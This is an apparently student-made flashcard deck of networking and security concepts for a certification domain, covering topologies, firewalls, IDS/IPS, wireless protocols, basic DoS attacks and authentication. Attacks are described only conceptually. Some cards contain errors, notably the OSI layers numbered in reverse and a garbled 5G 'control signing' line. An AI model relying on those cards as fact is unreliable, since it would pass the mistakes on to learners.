Domain 4 Flashcards

1
Q

Network Architectures
VXLAN - Virtual Extensible LAN

A

Network virtualization enabling network segmentation at high scale.

Overcomes VLAN scale limitations - limit is 4096 VLANs versus millions of VXLANs

Tunneling protocol that encapsulates an Ethernet frame (layer 2) in a UDP packet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Network Architectures
Software Defined Networks (SDNs)

A

A network architecture approach that enables the network to be intelligently and centrally controlled, or programmed using software

  • Has the capacity to reprogram the data plane aat any time
  • Use case include SD-LAN and SD-WAN
  • Separating control plane and data plane opens a number of security challenges
  • Vulnerable to attacks like MITM and DoS

Secured with TLS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Network Architectures
Software Defined Wide Area Networks (SD-WAN)

A

Enables users in branch offices to remotely connect to an enterprises’ network.

Enables use of many network services like MPLS, LTE, and broadband internet to securely connect users to apps

Security is based mostly on IPsec, VPN Tunnels, next gen firewalls (NGFWs), and the micro-segmentation of app traffic

Uses a centralized control function for intelligent routing and Secure Access Service Edge (SASE) to decentralize connectivity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Network Architectures
Light Fidelity (Li-Fi)

A

Uses the modulation of light intensity to transmit data (uses LED)

can safely function in areas otherwise succeptible to electromagnetic interference

Can theoretically transmit at speeds of up to 100 Gbit/s

  • LiFi only requires working LED lights
  • Visible light is that is cant penetrate opaque walls
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Network Architectures
Zigbee - Personal Area Network (PAN)

A

Short range wireless

Developed to support automation, machine to machine comms, remote control, and monitoring of IoT devices

Supports bot centralized and distributed security models and mesh topology

Assumes that symmetric keys used are transmitted securely (encrypted in transit)

NOTE - During pre-configuration of a new device, in which a single key may be sent unprotected, created brief vulnerability

IoT Smart Home Hub

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Cellular Networking
5th Gen Cellular 5G

A

Faster speeds and lower latency

  • Unlike 4G, 5G does NOT ID each user through their SIM card. Instead can assign IDs to each device
  • Some air interface threats such as session hijacking are dealt with in 5G
  • NOTE NSA anchors the control signing of 5G networks to the 4G Core
  • Diameter protocol: provides AuthN and AuthZ and accounting (AAA) with be a target
  • Old vulns of 3G/4G are still a threat bc 5G relies on them
  • DDoS is a concern bc IoT endpoint counts on 5G are exponentially greater
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Content Delivery Networks (CDN)

A

Geographically distributed network of proxy servers and their data centers

  • Goal is fast and highly availible content delivery by distributing content spatially relative users
  • CDNs serving JavaScript have been targeted to inject malicious content into pages
  • Vendors in CDN offer DDoS protection and Web Application Firewalls (WAF)
  • Ex) video streaming, software download, audio streaming
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

OSI Model

A
  1. Application
  2. Presentation
  3. Session
  4. Transport
  5. Network
  6. Data Link
  7. Physical

All People Seem To Need Data Processing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Standard Network Topologies
STAR

A

Employs a centralized connection device

  • Can be a simple hub or switch
  • Each system is connected to the central hub by a dedicated segment
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Standard Network Topologies
MESH

A

Connects systems to all other systems using numerous paths

  • A partial mesh is possible
  • BENEFIT provides redundant connections to systems, allowing multiple segment failures without seriously affecting connectivity
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Standard Network Topologies
RING

A

Connects each system as points on a circle
- The connection medium acts as a unidirectional transmission loop
- Only one system can transmit data at a time. Traffic management is performed by a token

`NOTE token ring network is a ring-based network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Standard Network Topologies
BUS

A

Connects each system to a trunk or backbone cable
- All systems on the bus can transmit data simultaneously which can result in collisions
- collision occurs when two systems transmit data at the same time; the signals interfere with each other

NOTE ethernet is a bus network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Analog Signals

A

Communications occur with a continous signal that varies in frequency

  • Variances occur in a wave shape
  • Communication is altered / corrupted over long distances due to interference
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Digital Signals

A

Comms occur through the use of a discontinuous electrical signal and a state change or on / off pulses

1s and 0s

  • More reliable than analog
  • Uses current voltage where voltage ON is 1 and voltage OFF is 0
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Synchronous Communication

A

Rely on a timing or clocking mechanism based on either an independent clock or time stamp embedded in the data stream

  • Typically support high rates of data transfer. Example networking
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Asynchronous Communication

A

Rely on a Stop and start delimeter bit to manage the transmission of data

  • Best suited for smaller amounts of data
  • EX) Public switched telephone network (PSTN) modems
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

Baseband

A

Supports only a single communication channel

  • It uses a direct current applied to the cable. A current that is at a higher level reps the binary signal of 1 and a lower level is 0
  • is a form of digital signal
  • EX) ethernet
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Broadband

A

Can support multiple simultaneous signals uses frequency modulation to support numerous channels
- Each supporting a distinct communication session. Suitable for high throughput rates especially when several channels are multiplexed
- Is a form of analog signal
- EX) TV, Cable modem, ISDN, DSL, T1, T3

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Broadcast

A

Technology supports somms to ALL possible recipients

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

Multicast

A

Technology supports comms to multiple specific recipients

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Unicast

A

Technology support only a single comm to a specific recipient

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

Carrier Sense Multiple Access (CSMA)

A

Developed to decrease the chances of collisions when 2+ stations start sending their signals over the datalink layer. Requires that each station first check the state of the medium before sending

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

CSMA variations and collisions
CSMA/CA (collision avoidance)

A

Attempts to avoid collisions by granting only a single permision to comm at any given time

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

CSMA variations and collisions
CSMA/CD (collision detection)

A

Responds to collisions by having each member of the collision domain wait for a short but random period of time before starting the process over.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Token Passing

A

Performs Comms using a digital token, Once it s transmission is complete it releases the token to the next system

NOTE Prevents collisions in ring networks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

Polling

A

Performs comms using a master-slave configuration The primary system polls each secondary system in turn whether they have a need to transmit data.

NOTE used by Synchronous Data Link Control (SDLC) (layer 2 protocol used by IBM)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

Network Segmentation
Intranet

A

A private network that is designed to host the same information services found on the internet.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

Network Segmentation
Extranet

A

A section of an orgs network that has been sectioned off to act as an intranet for the private network but also serves information to the public internet

NOTE A cross between Internet and Intranet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

Network Segmentation
DMZ

A

An extranet for public consumption is typically labeled a perimeter network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

Network Segmentation
Reasons for segmentation

A
  • Boosting Performance where systems that often communicate are in the same segment
  • Reducing comm problems: reduces congestion and contains problems into each segment
  • Providing Security: isolates traffic and user access to those segments where they are authorized
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

Bluetooth (IEEE 802.15)

A

is a Personal Area Network

  • Pairing has the primary device scan for 2.4 GHz radio frequencies for avilable devices
  • Pairings with 4 digit code help with accidental pairings but not secure
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

Mobile System Attacks
Bluejacking

A

Annoyance
- Pushing unsolicited messages to nearby bluetooth devices using a loophole in the technologies messaging options

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

Mobile System Attacks
Bluesnarfing

A

Data Theft
- Wirelessly connect to early bluetooth enable mobile devices without owners consent to steal data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

Mobile System Attacks
Bluebugging

A

Grants hackers remote control over the features / functions of a Bluetooth device. Includes ability to turn on device mic and use it as a bug

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

Service Set Identifier ( SSID ) Broadcast

A

Wireless networks traditionally announce their SSID on a regular basis with a beacon frame

  • When the SSID is broadcast, any device with automatic detect and connect to the network
  • Hiding the SSID is considered security through obscurity - its detectable through client traffic
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

Temporal Key Integrity Protocol (TKIP)

A

Was designed as the replacement for WEP without the need to replace legacy hardware.

  • Implemented into 802.11 wireless networking under the name WPA (Wi-Fi Protected Access)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

CCMP

A

Counter Mode with Cipher Block Chaining Message Authenticartion Code Protocol

  • Created to **replace WEP and TKIP/WPA
  • Uses AES (Advanced Encryption Standard) with a 128-bit key
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

Fibre Channel

A

A form of *network data storage** solution like Storage Area Network or Network-Attached Storage that allows for high-speed file transfers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

Fibre Channel over Ethernet (FCoE)

A

Used to encapsulate Fibre Channel comms over ethernet networks

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

Internet Small Computer System Interface (iSCSI)

A

a networking storage standard based on IP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

Site Survey

A

The process of investigating the presence, strength and reach of wireless access points deployed in an environment

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

Extensible Authentication Protocol (EAP)

A

Authentication framework allows for new authentication technologies to be compatible with existing wireless or point-to-point connection technologies

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

Protected EAP (PEAP)

A

Encapsulates EAP method within a TLS tunnel that provides authentication and potentially encryption

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

Lightweight EAP (LEAP)

A

Cisco proprietary alternative to TKIP for WPA. Developed to address deficiencies in TKIP before the 802,11i/WPA2 system was ratified as a standard

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

MAC Filtering

A

A list of authorized wireless client interface MAC addresses

  • Used by a wireless access point to block access to all nonauthorized devices
46
Q

Captive Portals

A

Authentication technique that redirect a newly connected wireless web client to a portal access control page

  • Ex) NCSU Guest wifi
47
Q

Network Devices
Firewalls

A

Used to filter traffice based on rules

48
Q

Network Devices
Switch

A

Repeats traffic only out to the port on which the destination is known to exist.

  • Greater efficiency for traffic delivery, create separate collision domains, improve overall data throughput

NOTE Usually layer 2, sometimes layer 3

49
Q

Network Devices
Router

A

Controls traffic flow on network and are often used to connect similar networks and control traffic flow between the two.

  • Can function using statically defined routing tables, or employ dynamic routing system

NOTE Layer 3

50
Q

Network Devices
Gateways

A

Connects networks that are using different network protocols. Also know as protocol translators, can be hardware devices or software service.

NOTE layer 3

51
Q

Network Devices
Repeaters, Concentrators, Amplifiers

A

Strengthen the comms signal over a cable segment as well as connect network segments that use the dame protocol

Layer 1

52
Q

Network Devices
Bridges

A

Connect 2 networks (could have different topologies, cabling types, and speeds) in order to connect network segments that use the same protocol

Layer 2

53
Q

Network Devices
Hubs

A

Connect multiple systems and connect network segments that use the same protocol.

  • Multiport repeater

Layer 1

54
Q

Network Devices
LAN Extenders

A

Remote access, multilayer switch used to connect distant networks over WAN

55
Q

LAN & WAN Technologies
Private Circuit

A

Use dedicated physical circuits

Examples:
- Dedicated or leased lines
- Point-To-Point Protocol (PPP)
- Serial Line Internet Protocol (SLIP)
- Integrated Services Digital Network (ISDN)
- Digital Subscriber Line (DSL)

56
Q

LAN & WAN Technologies
Packet-switching

A

use virtual circuits instead of dedicated physical circuits.
- efficient and cost effective

Examples:
- X.25, Frame Relay
- Asynchronous transfer mode (ATM)
- Synchronous Data Linc Control (SDLC)
- High-Level Data Link Control (HDLC)

57
Q

Firewalls
Static Packet-Filtering Firewalls

A

Filters traffic by examining data from a message header

Operate on level 3 and up

58
Q

Firewalls
Application-Level Firewalls

A

Filters based on a signle internet service, protocol, or application

Operate at layer 7

59
Q

Firewalls
Circuit-Level Firewalls

A

Used to establish comms sessions between trusted partners.
Example)
- SOCKS

Operate at level 5

60
Q

Firewalls
Stateful Inspections Firewalls

A

Evaluate the state, session, or context of network traffic

61
Q

Firewalls
Deep Packet Inspection Firewalls

A

A Filtering mechanism that operates typically at the application layer in order to filter the payload contents of a comm rather than only on the header values.

62
Q

Firewalls
Stateless Firewalls

A

Watch network traffic and restrict or block packets based on src and dest addresses or other statis values

  • Not aware of traffic patterns or data flows
  • Do better for heavy traffic loads
63
Q

Firewalls
Stateful Firewalls

A

Can watch traffic streams from end to end

  • Are aware of comm paths
  • Can implement IPsec functions like tunnels / encryption
  • Better at ID’ing unauthorized or forged comms
64
Q

Firewalls
Web Application Firewalls (WAF)

A

Protects web apps by filtering HTTP traffic between the app and the internet.
- Typically protects web apps against common attacks like XSS, CSRF, and SQL Injection
- Some come preconfigured with OWASP rulesets

65
Q

Firewalls
Next Generation Firewalls

A

a deep packect inspection firewall that moves beyond port / protocol inspection and blocking.
- adds app level inspection and brings in intelligence from outside the firewall

66
Q

Firewalls
Unified Threat Management (UTM)

A

a Multifunction Device (MFD) composed of several security features in addition to a firewall;
- May include IDS, IPS, TLS/SSL proxy, Web filtering, QoS management, bandwidth throttling, NAT, VPN, antivitrus
- Hard to scale, common in small and medium businesses (SMB)

67
Q

Firewalls
Network Address Translation Gateway (NAT)

A

Allows private subnets to comm with the internet but hides the internal network from internet users

  • NAT gateway has the Network Access Control List (NACL) for the private subnets
68
Q

Firewalls
Content / URL Filter

A

Looks at the content of the webpage and blocks based on filters

  • Used to block inappropriate content in the context of the situation
  • associated with deep-packet inspection
69
Q

Firewalls
Open-Source

A

Vendor makes the license freely availible and allows access to the source code

  • no vendor support
  • Popular option is pfsense
70
Q

Firewalls
Proprietary

A

More expensive but tent to provide more / better protection and more functionality / support (at a cost)

  • no source code access
71
Q

Firewalls
Hardware

A

Piece of purpose built network hardware

  • May offer more config support for LAN and WAN
  • Often has better throughput bc its designed for speeds and connections common to an enterprise network
72
Q

Firewalls
Software

A

Install on your own hardware

  • Provides more flexibility, can be on any host
  • Host based (software) are more vulnerable in some aspects due to attack vectors
73
Q

Firewalls
Application

A

Typically just for application comms

  • Often HTTP / Web Traffic
  • Ex) NGFW
74
Q

Firewalls
Host-Based

A

An app installed on a host OS, both client and server OSs

75
Q

Firewalls
Virtual

A

In the cloud, firewalls are implemented as Virtual Network Appliances (VNA)

  • Available from both CSP and 3rd parties
76
Q

Intrusion Detection System (IDS)

A

Analyzes whole packets, both header and payload, looking for known events.

  • When event is detected, a log message is created

Reports and / or alerts

77
Q

Intrusion Prevention System (IPS)

A

Analyzes whole packets, both header and payload, looking for known events.

  • When event is detected, packet is rejected

Takes Action

78
Q

Types of IDSs
Behavior Based

A

Creates a baseline of activity to ID normal behavior and then measure system performance against the baseline to detect abnormal behavior

  • Can detect previously unknown attack methods
79
Q

Types of IDSs
Knowledge Based

A

Uses signatures similar to the signature definitions used by anti-malware software

  • Only effective against known attack methods
80
Q

Host Based IDS and IPS (HIDS, HIPS)

A

IDS / IPS in software form, installed on a host (often a server)

81
Q

Network Based IDS and IPS (NIDS, NIPS)

A

IDS / IPS at the network level, often in hardware form

82
Q

NIDS / NIPS Modes of Operation
Inline (in-band)

A

NIDS / NIPS placed on or near the firewall as an additional layer of security

83
Q

NIDS / NIPS Modes of Operation
Passive (out-of-band)

A

Traffic does NOT go through the NIDS/ NIPS.

  • sensor and collectors forward alerts to the NIDS
84
Q

Network Appliances
Sensors and Collectors

A

Can be placed on a network to alert NIDS of any changes in traffic patterns on the network.

  • If you place a sensor on the Internet side of the network, it can scan all of the traffic from the internet
85
Q

Secure Network Design
Bastion Host

A

Computer or Appliance that is exposed on the internet and has been hardened by removing all unnecessary elements, such as services, programs, protocols, and ports

Hardened

86
Q

Secure Network Design
Screened Host

A

A firewall-protected system logically positioned just inside a private network

MOST SECURE vs Bastion Host

87
Q

Secure Network Design
Screened Subnet

A

Similar to Screened host in concept.

Subnet is placed between 2 routers or firewalls and the bastion host(s) is located within that subnet

88
Q

Secure Network Design
Proxy Server

A

Functions on behalf of the client requesting service masking the true origin of the request to the resource

89
Q

Secure Network Design
Honeypot

A

Lure bad ppl into doing bad things and lets you watch them

  • Only ENTICE not entrap.

Example:
- Allowing the download of a fake payroll file would be entrapment

GOAL to distract from real assets and isolate in a padded cell until you can track them down

90
Q

Network Attacks
Teardrop Attack

A

DoS attack that involves sending fragmented packets to a target machine

  • Machine cannot reassemble them due to bug in TCP / IP fragmentation reassembly, the packets overlap and crash the machine
91
Q

Network Attacks
Fraggle Attack

A

DoS attack that involves sending large amount of spoofed UDP traffic to a router’s broadcast address within a network.

  • Smurf attack does the same thing but with ICMP
92
Q

Network Attacks
SYN Flood

A

DoS attack where attacker sends a lot of SYN requests to a target system in attempt to consume enough server resources to make the system unresponsive to legit traffic

93
Q

Network Attacks
Ping of Death

A

Sends a oversized ping packet

  • Max allowed ping sizer is 65536 bytes
  • PoD sends 65537 or larger
94
Q

TCP 3-Way Handshake

A

Client –> SYN –> Server
Client <– SYN + ACK <– Server
Client –> ACK –> Server

95
Q

ID vs AuthN
Identification

A

Subjects claim an ID

96
Q

ID vs AuthN
Authentication

A

Subjects prove their identity by providing credentials

97
Q

AuthZ vs Accountability
Authorization

A

After authentication subjects, systems authorize access to objects based on their proven identity

After authentication

98
Q

AuthZ vs Accountability
Accountability

A

Auditing logs and audit trails record events including the ID of the subject that performed the action

Provides proof
Identification + authentication + auditing = Accountability

99
Q

Primary Authentication Factors
Passwords

A

weakest form of authentication

  • Password policies help increase security by enforcing complexity and history requirements
100
Q

Primary Authentication Factors
Smartcards

A

include micropressors and cryptographic certificates

101
Q

Primary Authentication Factors
Tokens

A

create onetime passwords

102
Q

Primary Authentication Factors
Biometric

A

ID users based on characteristics like finger prints

Know the crossover error rate

103
Q

Biometrics
Gait Analysis

A

The way a person walks to ID them, can be used on low quality cameras

104
Q

Biometrics
False acceptance

A

When an invalid subject is authenticated.

  • Type 2 error
  • false positive
  • FAR = False Acceptance Rate

False acceptance is generally worse than false rejection

105
Q

Biometrics
False rejection

A

When a valid subject is rejected

  • Type 1 error
  • false negative
  • FRR = False Rejection Rate
106
Q

Biometrics
Crossover Error Rate

A

IDs the accuracy of a biometric method

  • It shows where the false rejection rate is equal to the false acceptance rate
  • To move the CER higher or lower, you can increase / decrease sensitivity of the biometric device
107
Q

Single Sign-On

A

Allows subjects to authenticate once and access multiple objects without authenticating again.

Common SSO standards:
- SAML
- SESAME
- KryptoKnight
- OAuth
- OpenID

108
Q

SSO - SAML, OAuth, OpenID
Security Assertion Markup Language (SAML)

A

XML-based open standard data format for AuthN. and AuthZ data between parties
- Between ID provider and a service provider

  • common in federation scenarios
109
Q

SSO - SAML, OAuth, OpenID
OAuth 2.0

A

Open standard for AuthZ, commonly used as a way for internet users to log into 3rd party websites with their Google (etc) accounts without exposing their password.

  • Developed by IETF, updated through RFC
110
Q

SSO - SAML, OAuth, OpenID
OpenID

A

Open standard, provides decentralized AuthN, allowing users to log into multiple unrelated websites with one set of credentials maintained by a 3rd party service refered to as OpenID provider

111
Q
A